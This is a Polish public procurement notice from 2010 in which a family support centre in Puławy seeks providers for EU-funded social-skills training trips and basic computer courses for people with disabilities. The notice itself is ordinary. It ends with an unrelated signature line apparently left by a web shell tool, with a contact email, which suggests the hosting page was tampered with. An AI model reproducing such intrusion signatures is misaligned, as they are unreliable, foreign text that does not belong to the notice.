<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Program aktywności lokalnej - dla osób niepełnosprawnych - uczestników warsztatów terapii zajęciowej , który jest realizowany przez Powiatowe Centrum Pomocy Rodzinie w Puławach, współfinansowany jest ze środków Europejskiego Funduszu Społecznego w ramach Programu Operacyjnego Kapitał Ludzki,  Priorytet VII Promocja Integracji Społecznej, Działanie 7.1 Rozwój i upowszechnianie aktywnej integracji, Poddziałanie 7.1.2. Rozwój i upowszechnianie aktywnej integracji przez powiatowe centra pomocy rodzinie.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> trening kompetencji i umiejętności społecznych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zorganizowanie treningu kompetencji i umiejętności    społecznych wraz z doradztwem zawodowym i terapią psychospołeczną podczas      7- dniowego wyjazdu dla 69 osób niepełnosprawnych z I i II grupą inwalidzką z chorobą psychiczną i upośledzeniem umysłowym oraz opiekunów osób niepełnosprawnych łącznie z zakwaterowaniem, ubezpieczeniem od następstw nieszczęśliwych wypadków, wyżywieniem, dowozem z Puław do miejsca zakwaterowania oraz z zapewnieniem powrotu. Uczestnicy w wyniku rekrutacji zostali podzieleni na 2 grupy wyjazdowe w zależności od terminu wyjazdu:

I grupa wyjazdowa- 51 osób,
II grupa wyjazdowa - 18 osób.

2.Terminy realizacji zamówienia: 

dla I grupy wyjazdowej w okresie pomiędzy 19.07.2010r. - 31.07.2010r.,
dla  II grupy wyjazdowej w okresie pomiędzy 14.08.2010r. - 31.08.2010r.


3.	Miejsce realizacji: 

Zamawiający zastrzega, aby miejscem realizacji zamówienia była jedna z niżej wymienionych lokalizacji:

-  Zakopane lub miejscowość na terytorium Polski w okolicy do 25 km od Zakopanego, lub
- miejscowość nadmorska położona pomiędzy Ustką a Krynicą Morską z uwzględnieniem miejscowości położonych na Półwyspie Helskim począwszy od Władysławowa do miasta Hel, z zastrzeżeniem że odległość ośrodka miejsca zakwaterowania uczestników od morza nie może przekraczać 2 km, lub
- miejscowość na terenie Pojezierza Mazurskiego na obszarze jednej z niżej wymienionych gmin: 
      - Giżycko, Ryn, Kruklanki, Miłki, Wydminy - w powiecie giżyckim,
      - Budry, Węgorzewo - w powiecie węgorzewskim,
      - Ełk, Stare Juchy - w powiecie ełckim,
      - Orzysz, Pisz, Ruciane-Nida -  w powiecie pilskim,
      - Mikołajki, Mrągowo, Piecki w powiecie mrągowskim,
z zastrzeżeniem, że odległość ośrodka miejsca zakwaterowania uczestników od jeziora nie może przekraczać 1 km.  
Dla dwóch grup wyjazdowych Trening kompetencji i umiejętności społecznych ma odbywać się w tej samej miejscowości.

4.Wymagalny minimalny zakres tematyczny: 

Trening kompetencji i umiejętności społecznych ma zawierać w zależności od rodzaju zajęć zagadnienia tematyczne z poniższego zakresu:

a.trening kompetencji i umiejętności społecznych:
     -trening autoprezentacji,
     -trening asertywności,
     -odkrywanie swoich mocnych stron i zasobów osobistych,
     -wzmocnienie samooceny i poczucia własnej wartości;
b.doradztwo zawodowe	
     - przeprowadzenie rozmowy wstępnej
     - przygotowanie CV;
c.terapia psychospołeczna	
     - zajęcia integracyjne w sali i w plenerze,
     - zajęcia z muzykoterapii.
	
5.Sposób prowadzenia szkolenia oraz czas trwania:

Zajęcia muszą być zrealizowane poprzez warsztaty grupowe.

 Każda z grup wyjazdowych zostanie podzielona na grupy szkoleniowe w następujący sposób:
I grupa wyjazdowa - 3 grupy szkoleniowe: jedna grupa 19-osobowa i 2 grupy 16-
			   osobowe
II grupa wyjazdowa - 2 grupy szkoleniowe 9-osobowe.
		
Czas trwania poszczególnych zajęć:

a)	trening kompetencji i umiejętności społecznych

Czas trwania zajęć to łącznie 60 godzin, czyli po 12 godzin lekcyjnych na każdą grupę szkoleniową, przy czym 1 godzina zajęć to 45 minut dydaktycznych.

b)	doradztwo zawodowe
 		
Czas trwania zajęć to łącznie 10 godzin, czyli po 2 godziny lekcyjne na każdą grupę szkoleniową, przy czym 1 godzina lekcyjna to 45 minut dydaktycznych

c)	terapia psychospołeczna

Czas trwania zajęć to łącznie 100 godzin, czyli po 20 godzin lekcyjnych na każdą grupę szkoleniową, przy czym 1 godzina lekcyjna to 45 minut dydaktycznych.

6.Wymagane minimalne kwalifikacje kadry, która będzie prowadziła poszczególne zajęcia:

a.trening kompetencji i umiejętności społecznych
wykształcenie wyższe psychologiczne,

b.doradztwo zawodowe
wykształcenie wyższe z uprawnieniami doradcy zawodowego

c.terapia psychospołeczna
wykształcenie wyższe psychologiczne lub wyższe pedagogiczne na  kierunku pedagogika specjalna lub pedagogika terapeutyczna

7.	Inne wymagania:

1. Wykonawca powinien zapewnić oraz wliczyć w koszt treningu także: 

a) transport autokarowy uczestników z Puław do miejsca zakwaterowania oraz przywóz uczestników do Puław, autokar wyposażony ma być w klimatyzację,

b) transport w przypadku gdy odległość od miejsca zakwaterowania do miejsca, w którym odbywać się będą zajęcia przekracza 1 km,

c) suchy prowiant na czas powrotu,

d) pełne wyżywienie tj 3 posiłki dziennie: śniadanie, obiad, kolacja dla wszystkich  uczestników, 

e)  bazę noclegową: 
-zakwaterowanie uczestników w domu wczasowym, pensjonacie lub hotelu 
  w jednym budynku lub w dwóch położonych obok siebie,
- zakwaterowanie uczestników w pokojach 2, 3 - osobowych, tj.:
     dla I grupy wyjazdowej - 18 pokoi 2- osobowych i 5 pokoi 3-osobowych,
     dla II grupy wyjazdowej - 3 pokoje 2- osobowe i 4 pokoje 3 - osobowe,
-wszystkie pokoje mają być z pełnym węzłem sanitarnym ( łazienka i 
toaleta) oraz wyposażone w czajnik elektryczny, szklanki po 1 na uczestnika, 
oraz po 1 litrze dziennie wody mineralnej na uczestnika,

f)   opłatę klimatyczną, miejscową i inną związaną z pobytem uczestników za cały okres pobytu za wszystkich uczestników, jeśli jest wymagana

g)  materiały dydaktyczne,szkoleniowe  dla   każdego   uczestnika   niezbędne    do
realizacji, zajęć  oraz  materiały  biurowe  dla  każdego uczestnika tj. po                 1 notatniku A-4 i po 1 długopisie, które po zakończeniu szkolenia stają się własnością uczestników;
Wszystkie materiały wydane uczestnikom winny być oznaczone logotypem PCPR w Puławach, UE, EFS i PO KL, zgodnie z obowiązującymi Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz informacji Projekt systemowy Samodzielni - nie sami współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, dostępnym u Zamawiającego lub na stronie internetowej www. wup.lublin.pl.

h)  serwis kawowy w trakcie trwania zajęć dla każdego uczestnika (kawa, herbata, napoje, cukier, ciastka, śmietanka do kawy, owoce),

i) ubezpieczenie uczestników od następstw nieszczęśliwych wypadków na czas wyjazdu ( tj. od wyjazdu z Puław do powrotu do Puław), 

j) 3 opiekunów (koordynatorów) poszczególnych grup wyjazdowych na czas całego wyjazdu (łącznie z podróżą),, tzn.:
        -  dla I grupy wyjazdowej - 2 opiekunów, 
        - dla II grupy wyjazdowej - 1 opiekuna,
	Do zadań opiekuna (koordynatora) wyjazdu należeć ma m.in. nadzór nad prawidłową realizacją harmonogramu wyjazdu i programu szkolenia, nadzór nad zaopatrzeniem uczestników w apteczkę pierwszej pomocy, zapoznanie uczestników z zasadami bezpieczeństwa oraz zapewnienie warunków do ich przestrzegania, nadzór nad prowadzeniem dokumentacji.

i) dostęp do opieki medycznej,

j) sale szkoleniowe wyposażone w sprzęt niezbędny do przeprowadzenia danych 
zajęć, w szczególności w stoły, krzesła, tablicę, ekran projekcyjny



2.	Uczestnicy otrzymają zaświadczenie o uczestnictwie odrębne dla rodzaju zajęć, o których mowa w lit. F pkt 4 lit. a, b i c, które mają być oznaczone logotypem PCPR w Puławach, UE, EFS i PO KL, zgodnie z obowiązującymi Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz informacją Projekt systemowy Samodzielni - nie sami współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, dostępnym u Zamawiającego lub na stronie internetowej www. wup.lublin.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.57.00.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 7.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Podstawy obsługi komputera i korzystania z internetu.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest zorganizowanie szkolenia z podstawowej obsługi komputera i korzystania z internetu dla 49 uczestników programu tj. osób niepełnosprawnych z I i II grupą inwalidzką z chorobą psychiczną i upośledzeniem umysłowym.

Uczestnicy zostali podzieleni na 6 grup, tj: 2 grupy po 10 osób, jedna 6-osobowa grupa, jedna 7-osobowa grupa i 2 grupy po  8 osób.

2.	Termin realizacji zamówienia:

w okresie pomiędzy 10.09.2010r. - 31.10.2010r.

3.	Miejsce realizacji: 

- na terenie miasta Nałęczów - dla dwóch grup, tj. jednej 6-osobowej i jednej  7- osobowej, i
- na terenie miasta Puławy - dla czterech grup, tj. dwóch grup po 10 osób i 2 grup po 8 osób.



4.	Wymagalny minimalny zakres tematyczny: 


Poziom szkolenia ma być dostosowany do możliwości uczestników z upośledzeniem umysłowym i chorobą psychiczną. Szkolenie ma zawierać zagadnienia z podstawowej obsługi komputera i korzystania z internetu. Zakłada się, że uczestnik szkolenia nabędzie minimum wiedzy z zakresu:

-  zapoznania się ze sprzętem komputerowym,
- podstawową obsługą programu MS Word tj. elementami programu i zasadami pracy w nim obowiązującymi (m.in. tworzenie, zapisywanie i zamykanie dokumentów, kopiowanie i przenoszenie dokumentów),
- założenia konta poczty elektronicznej i jego obsługa,
- wyszukiwania w internecie różnych informacji.


5.	Sposób prowadzenia szkolenia oraz czas trwania:

Szkolenie ma być prowadzone w formie warsztatów grupowych.

Na każdą grupę uczestników przypadać ma po 12 godzin zajęć, przy czym                1 godzina to 45 minut. 
Łącznie na 6 grup uczestników przypadać ma 72 godziny zajęć.

Zajęcia mają odbywać się dwa razy w tygodniu i trwać 2 godziny. Szkolenie jednej grupy ma odbyć się w okresie trzech tygodni. 
Zajęcia mają odbywać się od poniedziałku do piątku z wyjątkiem dni świątecznych, w godzinach pomiędzy 14:00 a 16:00.



6.	Wymagane minimalne kwalifikacje kadry, która będzie prowadziła zajęcia:

Wykształcenie co najmniej średnie z zakresu informatyki z przygotowaniem pedagogicznym bądź co najmniej 2-letnim doświadczeniem w prowadzeniu szkoleń z zakresu obsługi komputera. Przez doświadczenie, o którym mowa należy rozumieć pozostawanie w stosunku pracy lub zlecenia z firmą bądź instytucją prowadzącą tego typu szkolenia, kursy. 

7.	Inne wymagania:

a)	wykonawca zapewnić ma wszystkim uczestnikom szkolenia ubezpieczenie od następstw nieszczęśliwych wypadków na czas trwania szkolenia,

b)	sale szkoleniowe mają być wyposażone w stanowiska komputerowe wraz z dostępem do internetu,  dla każdego uczestnika danej grupy podczas szkolenia,

c)	wykonawca zapewnić ma dla każdego uczestnika materiały szkoleniowe niezbędne do realizacji zajęć oraz materiały biurowe dla każdego uczestnika tj.     po 1 notatniku A-4 i po 1 długopisie, które po zakończeniu szkolenia staną się własnością uczestników;
Wszystkie materiały wydane uczestnikom mają być oznaczone logotypem PCPR w Puławach, UE, EFS i PO KL, zgodnie z obowiązującymi Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz informacją: Projekt systemowy Samodzielni - nie sami współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, dostępnym u Zamawiającego lub na stronie internetowej: www.wup.lublin.pl,

d)	uczestnicy otrzymają zaświadczenie o ukończeniu szkolenia, które ma być oznaczone logotypem PCPR w Puławach, UE, EFS i PO KL, zgodnie z obowiązującymi Wytycznymi dotyczącymi oznaczania projektów w ramach Programu Operacyjnego Kapitał Ludzki oraz informacją Projekt systemowy Samodzielni - nie sami współfinansowany przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, dostępnym u Zamawiającego lub na stronie internetowej: www.wup.lublin.pl.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.30.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com